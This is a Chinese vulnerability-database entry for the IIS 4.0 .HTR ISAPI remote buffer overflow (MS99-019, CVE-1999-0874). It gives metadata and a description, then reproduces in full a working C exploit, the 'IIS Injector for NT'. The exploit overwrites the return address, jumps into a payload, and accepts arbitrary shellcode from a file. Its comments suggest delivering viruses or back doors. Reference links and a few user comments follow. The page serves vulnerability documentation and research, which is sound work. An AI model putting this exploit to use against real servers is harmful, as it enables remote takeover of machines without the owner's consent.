Microsoft IIS 4.0 .HTR ISAPI扩展远程缓冲区溢出漏洞(MS99-019)
| 漏洞ID | 1105477 | 漏洞类型 | 缓冲区溢出 |
| 发布时间 | 1999-06-15 | 更新时间 | 2005-05-02 |
![图片[1]-Microsoft IIS 4.0 .HTR ISAPI扩展远程缓冲区溢出漏洞(MS99-019)-安全小百科](https://p0.ssl.qhimg.com/dr/29_50_100/t01bbbb9ac447dabd6a.png) CVE编号
|
CVE-1999-0874 |
![图片[2]-Microsoft IIS 4.0 .HTR ISAPI扩展远程缓冲区溢出漏洞(MS99-019)-安全小百科](https://p0.ssl.qhimg.com/dr/29_150_100/t01cd54df57948e31ea.png) CNNVD-ID
|
CNNVD-199906-019 |
| 漏洞平台 | Windows | CVSS评分 | 10.0 |
|漏洞来源
|漏洞详情
IIS4.0是一款WindowsNT系统自带的的Web服务器软件,由Microsoft公司开发维护。IIS4.0在处理以.HTR为后缀的文件请求时存在缓冲区溢出漏洞,远程攻击者可能利用此漏洞通过溢出攻击以Web进程的权限在目标系统上执行任意指令。IIS支持对一些特定文件名后缀(如.ASP、.IDC、.HTR)的文件请求执行进一步的处理,当服务器接到此类文件的请求时,每种后缀的文件由一个特定的DLL文件处理。ISM.DLL用于处理.HTR、.STM、.IDC为后缀的文件请求,IIS的HTRISAPI扩展在处理超长的htr文件名存在缓冲溢出漏洞,远程攻击者可以利用此漏洞通过溢出攻击进行拒绝服务攻击或者以LocalSystem的权限在目标系统上执行任意指令,从而完全控制主机。此ISAPI文件扩展映射默认情况下是打开的。
|漏洞EXP
source: http://www.securityfocus.com/bid/307/info
Microsoft IIS reported prone to a buffer overflow vulnerability in the way IIS handles requests for several file types that require server side processing. This vulnerability may allow a remote attacker to execute arbitrary code on the target machine.
IIS supports a number of file extensions that require futher processing. When a request is made for one of these types of files a specific DLL processes it. A stack buffer overflow vulnerability exists in several of these DLL's while handling .HTR, .STM or .IDC extensions.
// IIS Injector for NT
// written by Greg Hoglund <[email protected]>
// http://www.rootkit.com
//
// If you would like to deliver a payload, it must be stored in a binary file.
// This injector decouples the payload from the injection code allowing you to
// create a numnber of different attack payloads. This code could be used, for
// example, by a military that needs to attack IIS servers, and has characterized
// the eligible hosts. The proper attack can be chosen depending on needs. Since
// the payload is so large with this injection vector, many options are available.
// First and foremost, virii can delivered with ease. The payload is also plenty
// large enough to remotely download and install a back door program.
// Considering the monoculture of NT IIS servers out on the 'Net, this represents a
// very serious security problem.
#include <windows.h>
#include <stdio.h>
#include <winsock.h>
void main(int argc, char **argv)
{
SOCKET s = 0;
WSADATA wsaData;
if(argc < 2)
{
fprintf(stderr, "IIS Injector for NTnwritten by Greg Hoglund, "
"http://www.rootkit.comnUsage: %s <target"
"ip> <optional payload file>n", argv[0]);
exit(0);
}
WSAStartup(MAKEWORD(2,0), &wsaData);
s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if(INVALID_SOCKET != s)
{
SOCKADDR_IN anAddr;
anAddr.sin_family = AF_INET;
anAddr.sin_port = htons(80);
anAddr.sin_addr.S_un.S_addr = inet_addr(argv[1]);
if(0 == connect(s, (struct sockaddr *)&anAddr, sizeof(struct sockaddr)))
{
static char theSploit[4096];
// fill pattern
char kick = 'z'; //0x7a
char place = 'A';
// my uber sweet pattern gener@t0r
for(int i=0;i<4096;i+=4)
{
theSploit[i] = kick;
theSploit[i+1] = place;
theSploit[i+2] = place + 1;
theSploit[i+3] = place + 2;
if(++place == 'Y') // beyond 'XYZ'
{
place = 'A';
if(--kick < 'a') kick = 'a';
}
}
_snprintf(theSploit, 5, "get /");
_snprintf(theSploit + 3005, 22, "BBBB.htr HTTP/1.0rnrn�");
// after crash, looks like inetinfo.exe is jumping to the address
// stored @ location 'GHtG' (0x47744847)
// cross reference back to the buffer pattern, looks like we need
// to store our EIP into theSploit[598]
// magic eip into NTDLL.DLL
theSploit[598] = (char)0xF0;
theSploit[599] = (char)0x8C;
theSploit[600] = (char)0xF8;
theSploit[601] = (char)0x77;
// code I want to execute
// will jump foward over the
// embedded eip, taking us
// directly to the payload
theSploit[594] = (char)0x90; //nop
theSploit[595] = (char)0xEB; //jmp
theSploit[596] = (char)0x35; //
theSploit[597] = (char)0x90; //nop
// the payload. This code is executed remotely.
// if no payload is supplied on stdin, then this default
// payload is used. int 3 is the debug interrupt and
// will cause your debugger to "breakpoint" gracefully.
// upon examiniation you will find that you are sitting
// directly in this code-payload.
if(argc < 3)
{
theSploit[650] = (char) 0x90; //nop
theSploit[651] = (char) 0x90; //nop
theSploit[652] = (char) 0x90; //nop
theSploit[653] = (char) 0x90; //nop
theSploit[654] = (char) 0xCC; //int 3
theSploit[655] = (char) 0xCC; //int 3
theSploit[656] = (char) 0xCC; //int 3
theSploit[657] = (char) 0xCC; //int 3
theSploit[658] = (char) 0x90; //nop
theSploit[659] = (char) 0x90; //nop
theSploit[660] = (char) 0x90; //nop
theSploit[661] = (char) 0x90; //nop
}
else
{
// send the user-supplied payload from
// a file. Yes, that's a 2K buffer for
// mobile code. Yes, that's big.
FILE *in_file;
in_file = fopen(argv[2], "rb");
if(in_file)
{
int offset = 650;
while( (!feof(in_file)) && (offset < 3000))
{
theSploit[offset++] = fgetc(in_file);
}
fclose(in_file);
}
}
send(s, theSploit, strlen(theSploit), 0);
}
closesocket(s);
}
}
|参考资料
来源:MS
名称:MS99-019
链接:http://www.microsoft.com/technet/security/bulletin/ms99-019.asp
来源:EEYE
名称:AD06081999
链接:http://www.eeye.com/html/Research/Advisories/AD06081999.html
来源:CIAC
名称:J-048
链接:http://www.ciac.org/ciac/bulletins/j-048.shtml
来源:MSKB
名称:Q234905
链接:http://support.microsoft.com/default.aspx?scid=kb;%5BLN%5D;Q234905
来源:USGovernmentResource:oval:org.mitre.oval:def:915
名称:oval:org.mitre.oval:def:915
链接:http://oval.mitre.org/repository/data/getDef?id=oval:org.mitre.oval:def:915
来源:NSFOCUS
名称:3316
链接:http://www.nsfocus.net/vulndb/3316
HP-UX movemail权限许可漏洞 漏洞ID 1207577 漏洞类型 未知 发布时间 1997-01-06 更新时间 1997-01-06 CVE编号 CVE-1999-1249 CNNVD-ID CNNVD-199701-044 漏洞平台 N/A C…
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
恐龙抗狼扛9月前0
kankan啊啊啊啊3年前0
66666666666666